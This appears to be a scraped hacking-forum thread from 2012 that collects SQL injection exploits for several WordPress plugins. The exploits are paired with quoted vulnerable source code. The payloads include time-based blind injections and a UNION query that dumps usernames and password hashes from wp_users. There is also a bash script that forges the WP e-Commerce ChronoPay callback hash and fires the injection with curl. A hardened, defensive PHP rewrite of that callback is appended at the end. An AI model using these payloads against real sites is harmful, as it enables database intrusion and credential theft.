# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/collision-testimonials.zip
# Version: 3.0 (tested)
# Note: user has to be logged in as "admin"
---
PoC
---
http://www.site.com/wp-admin/admin.php?page=testimonials&featQuote&id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,11  2))),0)
   
---------------
Vulnerable code
---------------
if (isset($_GET['featQuote'])) {
  $id = $_GET['id'];
  mysql_query("UPDATE $testimonials SET featured=1 WHERE id=$id");
 
Decide | Date: Wednesday, 14.11.2012, 11:08 | Post # 87
DJ On Air Widget SQL-inj

Code
.....  
         $dj_ids = $wpdb->get_results("SELECT `meta`.`user_id` FROM ".$wpdb->prefix."usermeta AS `meta`  
                    WHERE `meta_key` = 'shifts'   
                    AND `meta_value` LIKE '%".$sDayTime."%';"     
                    );  

.....  

         foreach($dj_ids as $id) {  
             $fetch = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix."users AS `user` WHERE `user`.`ID` = ".$id->user_id.";");  
               
             $djs[] = $fetch;  
         }  
     .....


Code
http://wp/?dj-on-air=users&sdate=21-06-1945%+UNION+SELECT+1,2,3,4,5,group_concat(user_log  in,0x3a,user_pass+separator+0x3c62723e)+FROM+wp_us  ers+WHERE+ID+IN+(SELECT+user_id+FROM+wp_usermeta+W  HERE+meta_value=0x613A313A7B733A31333A2261646D696E  6973747261746F72223B623A313B7D)--+
 
Decide | Date: Wednesday, 14.11.2012, 11:08 | Post # 88
Timthumb Vulnerability Scanner path disclosure
this one is a total joke xD
PHP code:
....
if(isset($_REQUEST['cg-action'])){
    switch($_REQUEST['cg-action']){
        case 'scan':
            include_once 'cg-tvs-filescanner.php';
            $scanner = new CG_FileScanner(WP_CONTENT_DIR);
            $scanner->generate_inventory();
            $scanner->scan_inventory();
            update_option('cg_tvs_last_checked', date("Y-m-d H:i:s"));
            update_option('cg_tvs_vulnerable_files', $scanner->VulnerableFiles);
            update_option('cg_tvs_safe_files', $scanner->SafeFiles);
        case 'fix':
            $nonce = $_GET['_wpnonce'];
            if(wp_verify_nonce($nonce, 'fix_timthumb_file')){
                $fix_path = urldecode($_GET['file']);
                $src_file_path = trailingslashit(dirname(__FILE__)).'cg-tvs-timthumb-latest.txt';
                if(FALSE !== $fr = @fopen($src_file_path, 'r')){
                    $latest_src = fread($fr, filesize($src_file_path));
                    fclose($fr);
                }else{
                    $message = "CAN'T READ TIMTHUMB SOURCE FILE";
                    break;
                }
                if(FALSE !== $fw = @fopen($fix_path, 'w')){
                    if(fwrite($fw, $latest_src)){
                        $message = "File <strong>".basename($fix_path)."</strong> at <em>".$fix_path."</em> successfully upgraded.";
                    }else{
                        $message = "Unknown file write error.";
                    }
                }else{
                    $message = "CAN'T OPEN VULNERABLE FILE FOR WRITING";
                    break;
                }
....

Exploit:
Code:
http://wp/wp-cont....file[]=
 
Decide | Date: Wednesday, 14.11.2012, 11:09 | Post # 89
WP Photo Album Plus 4.0.12

Code
Blind SQLi @ wppa-functions.php:  

Code:

function wppa_crumb_page_ancestors($sep, $page = '0') {
global $wpdb;
global $wppa;
   
  $query = "SELECT post_parent FROM " . $wpdb->posts . " WHERE post_type = 'page' AND post_status = 'publish' AND id = " . $page . " LIMIT 0,1";
  $parent = $wpdb->get_var($query);
  if (!is_numeric($parent) || $parent == '0') return;
  wppa_crumb_page_ancestors($sep, $parent);
  $query = "SELECT post_title FROM " . $wpdb->posts . " WHERE post_type = 'page' AND post_status = 'publish' AND id = " . $parent . " LIMIT 0,1";
  $title = $wpdb->get_var($query);
  if (!$title) {
   $title = '****';  // Page exists but is not publish
   $wppa['out'] .= wppa_nltab().'<a href="#" class="wppa-nav-text b30" style="'.__wcs('wppa-nav-text').'" ></a>';
   $wppa['out'] .= wppa_nltab().'<span class="wppa-nav-text b31" style="'.__wcs('wppa-nav-text').'" >'.$title.$sep.'</span>';
  } else {
   $wppa['out'] .= wppa_nltab().'<a href="'.get_page_link($parent).'" class="wppa-nav-text b32" style="'.__wcs('wppa-nav-text').'" >'.$title.'</a>';
   $wppa['out'] .= wppa_nltab().'<span class="wppa-nav-text b32" style="'.__wcs('wppa-nav-text').'" >'.$sep.'</span>';
  }
}
 
Decide | Date: Wednesday, 14.11.2012, 11:09 | Post # 90
WordPress WP e-Commerce plugin <= 3.8.6 SQL Injection Vulnerability

One of the most popular plugins for WP!
A shitload of sites) it runs on every other site, and more often than that)

Quote:
---------------
PoC (POST data)
---------------
http://www.сайт.com/?chronopay_callback=true
cs2=chronopay&cs1=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,11 2))),0)%23&cs3=123f7bcd4ba53fade05886a7e77bf045&transaction_type=rebill

e.g.
#!/bin/bash
payload="-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,11 2))),0)#"
hash=`echo -n $payload | md5sum | tr -d '\n' | sed 's/\s*-\s*//g' | md5sum | tr -d '\n' | sed 's/\s*-\s*//g'`
curl --data "cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill" http://www.site.com/?chronopay_callback=true

---------------
Vulnerable code
---------------
./wp-e-commerce/wp-shopping-cart.php:

class WP_eCommerce {

function WP_eCommerce() {
add_action( 'plugins_loaded', array( $this, 'init' ), 8 );
}

function init() {
...
$this->load();
...
}
function load() {
...
wpsc_core_load_gateways();
...
}
...
$wpec = new WP_eCommerce();

./wp-e-commerce/wpsc-core/wpsc-functions.php:

function wpsc_core_load_gateways() {
global $nzshpcrt_gateways, $num, $wpsc_gateways,$gateway_checkout_form_fields;

$gateway_directory = WPSC_FILE_PATH . '/wpsc-merchants';
$nzshpcrt_merchant_list = wpsc_list_dir( $gateway_directory );

$num = 0;
foreach ( $nzshpcrt_merchant_list as $nzshpcrt_merchant ) {
if ( stristr( $nzshpcrt_merchant, '.php' ) ) {
require( WPSC_FILE_PATH . '/wpsc-merchants/' . $nzshpcrt_merchant );
}

./wp-e-commerce/wpsc-merchants/chronopay.php:

function nzshpcrt_chronopay_callback()
{
...
if(isset($_GET['chronopay_callback']) && ($_GET['chronopay_callback'] == 'true') && ($_POST['cs2'] == 'chronopay'))
{
$salt = get_option('chronopay_salt');
// - this is by default '' and set only if explicitly stated
// inside Store Settings->Payments->General Settings->
// Chronopay->Edit->Security Key
// - problem is that there are more popular payment gateways enlisted (e.g.
// Google Checkout and PayPal) and if that setting is not explicitly set
// it wide opens the door to the potential attacker

$gen_hash = md5($salt . md5($_POST['cs1'] . $salt));

if($gen_hash == $_POST['cs3'])
{
...
$sessionid = trim(stripslashes($_POST['cs1']));
$transaction_id = trim(stripslashes($_POST['transaction_id']));
$verification_data['trans_id'] = trim(stripslashes($_POST['transaction_id']));
$verification_data['trans_type'] = trim(stripslashes($_POST['transaction_type']));

switch($verification_data['trans_type'])
{
...
case 'rebill':
$wpdb->query("UPDATE `".WPSC_TABLE_PURCHASE_LOGS."` SET
`processed` = '2',
`transactid` = '".$transaction_id."',
`date` = '".time()."'
WHERE `sessionid` = ".$sessionid." LIMIT 1");
...
add_action('init', 'nzshpcrt_chronopay_callback');
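An added hardened version of the callback check (not WP e-Commerce's code): it refuses callbacks while the salt is unset, compares the digest with hash_equals(), and only lets a positive integer sessionid into the UPDATE. The names and the sample callback data are constructed for the demo; the md5(salt . md5(cs1 . salt)) construction is the one from the quoted code (PHP 7.4 or later).

```php
<?php
// Added example, not WP e-Commerce's code: the callback check from the
// chronopay.php excerpt above, rewritten so that (1) an unset gateway salt
// disables the callback instead of making the hash forgeable, (2) the hash is
// compared with hash_equals() rather than "==", and (3) sessionid is a
// positive integer before it is interpolated into the UPDATE. Class, function
// names and the sample data are constructed for the demo.

final class CallbackCheck
{
    public bool $accepted;
    public string $reason;
    public int $session_id;

    public function __construct(bool $accepted, string $reason, int $session_id = 0)
    {
        $this->accepted   = $accepted;
        $this->reason     = $reason;
        $this->session_id = $session_id;
    }
}

function verify_chronopay_callback(array $post, string $salt): CallbackCheck
{
    if ($salt === '') {
        // With salt '' the expected value is md5(md5(cs1)), which any sender can
        // compute, so refuse every callback until a security key is configured.
        return new CallbackCheck(false, 'gateway salt not configured');
    }
    $cs1 = $post['cs1'] ?? null;
    $cs3 = $post['cs3'] ?? null;
    if (!is_string($cs1) || !is_string($cs3)) {
        return new CallbackCheck(false, 'missing fields');
    }
    // Only a positive integer may ever reach the WHERE `sessionid` = ... clause.
    if (!preg_match('/^[1-9][0-9]*$/', $cs1)) {
        return new CallbackCheck(false, 'sessionid is not numeric');
    }
    $expected = md5($salt . md5($cs1 . $salt));
    // hash_equals() is constant-time and strict; "==" on two hex digests that both
    // look like "0e123..." would compare them as numbers and report equality.
    if (!hash_equals($expected, $cs3)) {
        return new CallbackCheck(false, 'bad signature');
    }
    return new CallbackCheck(true, 'ok', (int) $cs1);
}

/** The 'rebill' UPDATE with the verified integer id; transactid still gets escaped. */
function rebill_update_sql(int $session_id, string $transaction_id): string
{
    // addslashes() stands in for $wpdb->prepare('%s') so the file runs stand-alone.
    return "UPDATE `wp_purchase_logs` SET `processed` = '2', `transactid` = '"
        . addslashes($transaction_id) . "', `date` = '" . time()
        . "' WHERE `sessionid` = " . $session_id . " LIMIT 1";
}

// Constructed demo data.
$salt = 'demo-security-key';
$good = ['cs2' => 'chronopay', 'cs1' => '42', 'cs3' => md5($salt . md5('42' . $salt)), 'transaction_type' => 'rebill'];
$r = verify_chronopay_callback($good, $salt);
echo $r->reason, "\n";                                              // ok
if ($r->accepted) {
    echo rebill_update_sql($r->session_id, 'tx-001'), "\n";
}

// A sender who knows the salt is '' can sign anything; the hardened check refuses it anyway.
$tampered = ['cs2' => 'chronopay', 'cs1' => '42 OR 1=1', 'cs3' => md5('' . md5('42 OR 1=1' . ''))];
echo verify_chronopay_callback($tampered, '')->reason, "\n";        // gateway salt not configured
echo verify_chronopay_callback($tampered, $salt)->reason, "\n";     // sessionid is not numeric
```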
 